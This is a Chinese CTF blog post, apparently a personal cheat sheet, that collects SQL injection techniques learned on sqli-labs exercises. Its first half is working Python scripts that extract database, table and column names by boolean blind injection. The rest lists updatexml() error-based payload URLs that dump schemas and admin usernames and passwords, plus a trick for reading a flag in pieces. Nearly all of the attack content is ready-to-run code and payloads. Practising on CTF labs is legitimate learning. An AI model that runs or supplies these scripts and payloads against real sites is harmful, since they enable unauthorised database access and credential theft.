CTFHub衍生出来的sql姿势（持续更新）

       一些常用的ctf中的sql注入的脚本和Payload，先记录在这里。

布尔盲注

sqlilab Less-8

       用sqllib上的一个环境来学习一下怎么写脚本：

       首先是爆破数据库名，附上脚本：

url_0 = "http://dd82d9c9-1380-43e2-afc9-cb70f7c3c368.node3.buuoj.cn/Less-5/?id="
mark = "You are in"

def get_database(url):
    name = ''
    for j in range(1, 10):
        for i in range(48, 127):
            payload = "1' and ascii(mid(database(), %d, 1))=%d--+"%(j, i)
            url = url_0+payload
            #print(url)
            r = requests.get(url)
            url = url_0
            if mark in r.text:
                name = name+chr(i)
                print(name)
                break
    print("database_name:"+name)

get_database(url_0)

       然后是表名：

def get_tables(url_0):
    list = []
    name = ''
    for k in range(0, 4):
        for j in range(1, 10):
            for i in range(48, 127):
                payload = "1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit %d, 1), %d, 1))=%d--+"%(k, j, i)
                url = url_0+payload
                #print(url)
                r = requests.get(url)
                url = url_0
                if mark in r.text:
                    name = name+chr(i)
                    print(name)
                    break
        list.append(name)
        name = ''
    print('table_name:',list)

get_tables(url_0)

       然后整个字段，原理和爆table差不多的：

def get_column(url_0):
    list = []
    name = ''
    for k in range(0, 4):
        for j in range(1, 10):
            for i in range(48, 127):
                payload = "1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit %d, 1), %d, 1))=%d--+"%(k, j, i)
                url = url_0+payload
                #print(url)
                r = requests.get(url)
                url = url_0
                if mark in r.text:
                    name = name+chr(i)
                    print(name)
                    break
        list.append(name)
        name = ''
    print('column_name:',list)

get_column(url_0)

       这个ip是认真的吗？好吧，幸好不重要，不然我懵逼了。。接下来爆字段，代码都一样了。。

报错注入

updatexml()

       payload附上

http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) 
爆库
http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select schema_name),0x7e) FROM admin limit 0,1),0x7e),1)  
爆表
http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select table_name),0x7e) FROM admin limit 0,1),0x7e),1
爆字段
http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select column_name),0x7e) FROM admin limit 0,1),0x7e),1)  
爆字段内容
http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)

       上次遇到一道题显示不出来还用了mid函数把后32位表示出来，然后把右边和左边拼凑出来

?id=1 and (updatexml(1,concat(0x7e,mid((select group_concat(flag) from flag),32),0x7e),1));

       来推荐一波。。欢迎访问我的博客：https://zhiaowei.github.io/